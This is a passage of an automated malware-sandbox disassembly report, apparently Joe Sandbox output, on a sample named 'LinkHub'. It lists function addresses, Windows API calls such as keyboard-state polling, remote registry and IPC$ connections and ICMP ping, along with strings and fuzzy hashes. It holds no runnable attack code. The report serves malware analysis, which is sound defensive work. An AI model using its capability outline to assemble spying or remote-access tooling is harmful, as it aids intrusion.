mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C1F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C1F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C1F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C1F3BE

Strings

play PlayMe wait, xrefs: 00C1F3A8
play PlayMe, xrefs: 00C1F3B9
alias PlayMe, xrefs: 00C1F34D
status PlayMe mode, xrefs: 00C1F36F
open , xrefs: 00C1F323
close PlayMe, xrefs: 00C1F385, 00C1F3B2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: f8cf6b9e7b4cbe3a00a274e7117ec6424f8f70ece2c04be042f3bb958e8e072f
Instruction ID: 7ce6f20fdf539a32c4663220d08919461879109b71624b51f7ccc10213b45476
Opcode Fuzzy Hash: f8cf6b9e7b4cbe3a00a274e7117ec6424f8f70ece2c04be042f3bb958e8e072f
Instruction Fuzzy Hash: 5311E331A8021D7AD720A762CC0AEFFABBCEBC2B00F40057A7525E20E0DAA05D45C5B0

Function 00C1A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C1A9D9
SetKeyboardState.USER32(?), ref: 00C1AA44
GetAsyncKeyState.USER32(000000A0), ref: 00C1AA64
GetKeyState.USER32(000000A0), ref: 00C1AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00C1AAAA
GetKeyState.USER32(000000A1), ref: 00C1AABB
GetAsyncKeyState.USER32(00000011), ref: 00C1AAE7
GetKeyState.USER32(00000011), ref: 00C1AAF5
GetAsyncKeyState.USER32(00000012), ref: 00C1AB1E
GetKeyState.USER32(00000012), ref: 00C1AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00C1AB55
GetKeyState.USER32(0000005B), ref: 00C1AB63

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 381596ab514fd07dc9dc5926bd6ffbc82c147a7f075abefce63c47ad08704440
Instruction ID: dc2ddc5de4b252e929211018846ab3fc65fd467b2d0c2e160d1b0671e8db97fb
Opcode Fuzzy Hash: 381596ab514fd07dc9dc5926bd6ffbc82c147a7f075abefce63c47ad08704440
Instruction Fuzzy Hash: B351D770A097C42AEB35D7708850BEABFB55F03380F084599D5D2561C2DA549BCCEB63

Function 00C1662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C16649
GetWindowRect.USER32(00000000,?), ref: 00C16662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C166C0
GetDlgItem.USER32(?,00000002), ref: 00C166D0
GetWindowRect.USER32(00000000,?), ref: 00C166E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C16736
GetDlgItem.USER32(?,000003E9), ref: 00C16744
GetWindowRect.USER32(00000000,?), ref: 00C16756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C16798
GetDlgItem.USER32(?,000003EA), ref: 00C167AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C167C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00C167CE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0f68c0560b08d7d452a687660531fbded4ee62847857e6a37eb1d9d5b6778d7b
Instruction ID: 267efe0c6d9afe915d30524da1c29d37a75e4bf5848b8b9fa241da76f4884979
Opcode Fuzzy Hash: 0f68c0560b08d7d452a687660531fbded4ee62847857e6a37eb1d9d5b6778d7b
Instruction Fuzzy Hash: 6C513DB4B00205AFDB18DF68CD89BEEBBB5FB49314F108129F91AE7290D7709E408B50

Function 00BB146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB1488,?,00000000,?,?,?,?,00BB145A,00000000,?), ref: 00BB1865

DestroyWindow.USER32(?), ref: 00BB1521
KillTimer.USER32(00000000,?,?,?,?,00BB145A,00000000,?), ref: 00BB15BB
DestroyAcceleratorTable.USER32(00000000), ref: 00BF29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BB145A,00000000,?), ref: 00BF29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BB145A,00000000,?), ref: 00BF29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BB145A,00000000), ref: 00BF2A15
DeleteObject.GDI32(00000000), ref: 00BF2A27

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 4beeeb352d1484ddb3c60b1f9a961cfc879adec91a0c12c9cd96d0a5bc81884a
Instruction ID: 30b8de8e52ac7a35f4029a4258ed464b58dcc298a76c9cb561c63944fd971cf0
Opcode Fuzzy Hash: 4beeeb352d1484ddb3c60b1f9a961cfc879adec91a0c12c9cd96d0a5bc81884a
Instruction Fuzzy Hash: 79617931501705DFDB399F18D958B7AB7F1FB90322F908998E4438B660C7B1A894CF44

Function 00BB2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2234: GetWindowLongW.USER32(?,000000EB), ref: 00BB2242

GetSysColor.USER32(0000000F), ref: 00BB2152

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 492fa24dc1e590f64d98e068cb7bad56398c5fd9bf05cc4a49217925230c704f
Instruction ID: 97b9a1f97f976c298f7847b6f7e5e2469edcdd5e547fcd6e8380de86e85c55fb
Opcode Fuzzy Hash: 492fa24dc1e590f64d98e068cb7bad56398c5fd9bf05cc4a49217925230c704f
Instruction Fuzzy Hash: 6C41AF35200644AFDB206F28DC88BBD37E5FB46731F154695FAA2AB2E1C7B19D42DB10

Function 00C1A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00C00D31,00000001,0000138C,00000001,00000001,00000001,?,00C2EEAE,00C82430), ref: 00C1A091
LoadStringW.USER32(00000000,?,00C00D31,00000001), ref: 00C1A09A

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C00D31,00000001,0000138C,00000001,00000001,00000001,?,00C2EEAE,00C82430,?), ref: 00C1A0BC
LoadStringW.USER32(00000000,?,00C00D31,00000001), ref: 00C1A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1A1E0

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C1A1C4
Error: , xrefs: 00C1A197
Line %d (File "%s"):, xrefs: 00C1A109
Line %d:, xrefs: 00C1A11A
^ ERROR, xrefs: 00C1A175

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 8d663893fb571eaa9021126a33d76fc094575a776c3080bcab7a802f58181479
Instruction ID: 42585b48b2835d830ec97e832ba7fafbfa97219464879f641deb45fae48c9f9d
Opcode Fuzzy Hash: 8d663893fb571eaa9021126a33d76fc094575a776c3080bcab7a802f58181479
Instruction Fuzzy Hash: 32413F7290020DABCB15FBE0DD56EFEB7B8AF15700F5000A5B505B20A2DBB56F49DB61

Function 00C10FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C11093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C110AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C110CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C110F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C1111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C11128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C1112D

Strings

\IPC$, xrefs: 00C11075
\CLSID, xrefs: 00C11015
SOFTWARE\Classes\, xrefs: 00C10FFF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 18c73b6d6ded80afe5ef6da38e6d2f4b1719dc2d901b74da705d5512d45fb726
Instruction ID: 1cd8ad6c27abd5ef6d10061e60a01e688e029b31be9080967be3a041cf337cc5
Opcode Fuzzy Hash: 18c73b6d6ded80afe5ef6da38e6d2f4b1719dc2d901b74da705d5512d45fb726
Instruction Fuzzy Hash: 12412A76C10229ABCF21EFA4DC45DFEB7B8BF08740F044069EA12A3161EBB59E44CB50

Function 00C44A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C44AD9
CreateCompatibleDC.GDI32(00000000), ref: 00C44AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C44AF3
SelectObject.GDI32(00000000,00000000), ref: 00C44AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C44B06
DeleteDC.GDI32(00000000), ref: 00C44B10
GetWindowLongW.USER32(?,000000EC), ref: 00C44B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00C44B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00C44B3C

Strings

static, xrefs: 00C44A71

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: a8de1c65136e5940f4a733091027d9156b356f5971fa8cc6023509b6adb93e49
Instruction ID: 1005f3273f725bb79b277426dc1544f45066ac55846e7b70df50c1d095658a8e
Opcode Fuzzy Hash: a8de1c65136e5940f4a733091027d9156b356f5971fa8cc6023509b6adb93e49
Instruction Fuzzy Hash: 91317E36140215BBDF12AFA4DC09FDE3BA9FF0E365F110211FA26A61A0C775D860EB94

Function 00C3468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C346B9
CoInitialize.OLE32(00000000), ref: 00C346E7
CoUninitialize.OLE32 ref: 00C346F1
_wcslen.LIBCMT ref: 00C3478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00C3480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C34932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C3496B
CoGetObject.OLE32(?,00000000,00C50B64,?), ref: 00C3498A
SetErrorMode.KERNEL32(00000000), ref: 00C3499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C34A21
VariantClear.OLEAUT32(?), ref: 00C34A35

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: ae42909966ff1ded7ac9b5b35dfb6185d0d9c26bf835e1c9da6a6d0f45424985
Instruction ID: 9671c29d38a62648696f44f3e860634badf5b5c9e5b2ecca3badf007d703c618
Opcode Fuzzy Hash: ae42909966ff1ded7ac9b5b35dfb6185d0d9c26bf835e1c9da6a6d0f45424985
Instruction Fuzzy Hash: 82C14371614301AF8704DF68C884A6BBBE9FF89748F10495DF98ADB250DB70ED45CB92

Function 00C284DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C28538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C285D4
SHGetDesktopFolder.SHELL32(?), ref: 00C285E8
CoCreateInstance.OLE32(00C50CD4,00000000,00000001,00C77E8C,?), ref: 00C28634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C286B9
CoTaskMemFree.OLE32(?,?), ref: 00C28711
SHBrowseForFolderW.SHELL32(?), ref: 00C2879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C287BF
CoTaskMemFree.OLE32(00000000), ref: 00C287C6
CoTaskMemFree.OLE32(00000000), ref: 00C2881B
CoUninitialize.OLE32 ref: 00C28821

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 08d192001e30147cc7d1c336c5571ebdd0dec1d0c644c2d686a0eda60c7f84f5
Instruction ID: 2403f86a409b33d9a40cc816178631a5ced50541842bb0c1170595a8ad949943
Opcode Fuzzy Hash: 08d192001e30147cc7d1c336c5571ebdd0dec1d0c644c2d686a0eda60c7f84f5
Instruction Fuzzy Hash: 39C12C75A00115AFDB14DFA4D884DAEBBF9FF48304B148499F41ADB661DB30EE45CB90

Function 00C10378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C1039F
SafeArrayAllocData.OLEAUT32(?), ref: 00C103F8
VariantInit.OLEAUT32(?), ref: 00C1040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C1042A
VariantCopy.OLEAUT32(?,?), ref: 00C1047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C10491
VariantClear.OLEAUT32(?), ref: 00C104A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00C104B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C104BC
VariantClear.OLEAUT32(?), ref: 00C104CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C104D9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 225f772e9343f0b135ff807bb6dabb6e4687b01adeb7931237cc95ab9d040a56
Instruction ID: 676f4e69cc6285910a389d34d2e3f4f22a6e652ca6793b417cc801e13c5aeaa1
Opcode Fuzzy Hash: 225f772e9343f0b135ff807bb6dabb6e4687b01adeb7931237cc95ab9d040a56
Instruction Fuzzy Hash: 21416235E00219DFCB10EFA4D884AEE7BB9FF49354F108069F916A7261C774A985DF90

Function 00C1A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C1A65D
GetAsyncKeyState.USER32(000000A0), ref: 00C1A6DE
GetKeyState.USER32(000000A0), ref: 00C1A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00C1A713
GetKeyState.USER32(000000A1), ref: 00C1A728
GetAsyncKeyState.USER32(00000011), ref: 00C1A740
GetKeyState.USER32(00000011), ref: 00C1A752
GetAsyncKeyState.USER32(00000012), ref: 00C1A76A
GetKeyState.USER32(00000012), ref: 00C1A77C
GetAsyncKeyState.USER32(0000005B), ref: 00C1A794
GetKeyState.USER32(0000005B), ref: 00C1A7A6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3c12bf56e11c7dc7cb715c2cfcbd3539445354937b0f9845ae5815244fd31ea4
Instruction ID: c329688e7ea9bd7eadd3934ed40b290065c8987a37e16e0132ff5c01fa195ba0
Opcode Fuzzy Hash: 3c12bf56e11c7dc7cb715c2cfcbd3539445354937b0f9845ae5815244fd31ea4
Instruction Fuzzy Hash: 4941A6A46067C96DFF31966089043E5BEB06F13344F08845DD5E64A6C2EBA49FC8D7E3

Function 00C30FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C31019
inet_addr.WSOCK32(?), ref: 00C31079
gethostbyname.WSOCK32(?), ref: 00C31085
IcmpCreateFile.IPHLPAPI ref: 00C31093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C31123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C31142
IcmpCloseHandle.IPHLPAPI(?), ref: 00C31216
WSACleanup.WSOCK32 ref: 00C3121C

Strings

Ping, xrefs: 00C310D3

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 603d879b863d48b26467d4d8b2f4ce3fc016195e1478596dc0afa4c3bb96b7ba
Instruction ID: aeffc1d9f87b39c728a08f558ca4cd08b62e6137fd4b6b531aa2d6110f6ff90b
Opcode Fuzzy Hash: 603d879b863d48b26467d4d8b2f4ce3fc016195e1478596dc0afa4c3bb96b7ba
Instruction Fuzzy Hash: 0491AF316142419FD720DF15C888F6ABBE0BF48318F1885A9F9698B7A2C771EE45CB91

Function 00C39730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00C39750

Part of subcall function 00C19805: _wcslen.LIBCMT ref: 00C19828

_wcslen.LIBCMT ref: 00C397AB
_wcslen.LIBCMT ref: 00C397F9
_wcslen.LIBCMT ref: 00C39839
_wcslen.LIBCMT ref: 00C398CB

Strings

none, xrefs: 00C398C2, 00C398C7
cdecl, xrefs: 00C397A5, 00C397AA
winapi, xrefs: 00C397F3, 00C397F8
stdcall, xrefs: 00C39833, 00C39838

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 5895a2a5538956688408db4463e6e9b60bee9a4a38466297c1de910489b747bc
Instruction ID: 1145d05f6c26515546e840b6594b9f301eec7c396d4a18f56a2eb558f562a436
Opcode Fuzzy Hash: 5895a2a5538956688408db4463e6e9b60bee9a4a38466297c1de910489b747bc
Instruction Fuzzy Hash: A251AF32A10116ABCB14DF68C9509FEB7A5FF55360F204229E87AA72C0EBB1DE40C791

Function 00C34189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00C341D1
CoUninitialize.OLE32 ref: 00C341DC
CoCreateInstance.OLE32(?,00000000,00000017,00C50B44,?), ref: 00C34236
